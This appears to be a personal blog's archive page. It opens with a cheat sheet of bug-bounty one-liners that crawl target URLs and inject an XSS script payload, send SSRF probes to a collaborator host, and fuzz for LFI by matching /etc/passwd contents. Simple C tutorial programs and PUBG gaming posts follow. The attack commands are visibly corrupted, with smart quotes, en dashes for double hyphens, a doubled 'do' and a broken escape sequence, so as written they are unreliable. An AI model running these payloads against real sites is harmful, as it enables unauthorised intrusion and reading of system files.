Posts

Showing posts from March 8, 2021

Bug BOunty Helpful Commands

  cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done >>. to get urls from websites.... waybackurls target.com | tee urlss.txt dalfox file urlss.txt pipe   XSS   cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done SSRF findomain -t example.com -q | httpx -silent -threads 1000 | gau |  grep “=” | qsreplace http://YOUR.burpcollaborator.net LFI Follow this command to find LFI findomain -t example.com -q |  waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done find JS files on target.com https:/...

Find Factorial of a Number using Loop in C

 Hi guys, in this Article i will tell you about a program in C in which we can find the Factorial of a given number using While Loop. So start by Code ............. Read the following Code carefully and Understand it , in case of any problem please tell me. In this Article i have no any screen shot of the out put of the code please try your  self in any editor. Thank you........ #include<stdio.h> int main(){ int a,b=1; printf("Enter a value : "); scanf("%d",&a); int fac=1; while(b<=a){ fac=fac*b; b++; } printf("This is your factorial : %d ", fac);    return 0; }

How to input two variables from the user and display in C Programming

 In this Article i will tell you that  how to input two variables from the user and display their sum in C Language. Both variables are integers. So let start from Coding....... #include<stdio.h> int main() { int val1, val2, result; printf("Enter First Number : "); scanf("%d", &val1); printf("Enter Second Number : "); scanf("%d", &val2); result=val1+val2; printf("This is your Sum : %d ", result ); return 0; }

PUBG Intro

Image
 

PUBG || Gaming

Image
 

GAMING || PUBG

Image
 

PUBG Mobile || PUBG Lite

Image
 

How to initialize two characters and displays the effect of addition.

Image
This is a Program in C that How to initialize two characters and displays the effect of sum. So let start....👇👍 #include<stdio.h> int main(){ char val1, val2 ; int sum=0; val1='k'; val2='z'; printf("The First character is : %c \n", val1); printf("The Second character is : %c \n", val2); sum=val1+val2; printf("The sum of the Two character is : %d  \n", sum); return 0; } 

Input a 3 digit value from the user and display it in reverse order.

Image
 #include<stdio.h> int main(){ int a, b, n; printf("Enter Three Digits Value : "); scanf("%d", &n); a=n/100; n=n%100; b=n/10; n=n%10; printf("The Reverse order of the 3 digits Number is  : %d%d%d",n,b,a);     return 0; }

Popular posts from this blog

Very Huge Dorks for SQLi || Web Hacking

How to find index of the Array in C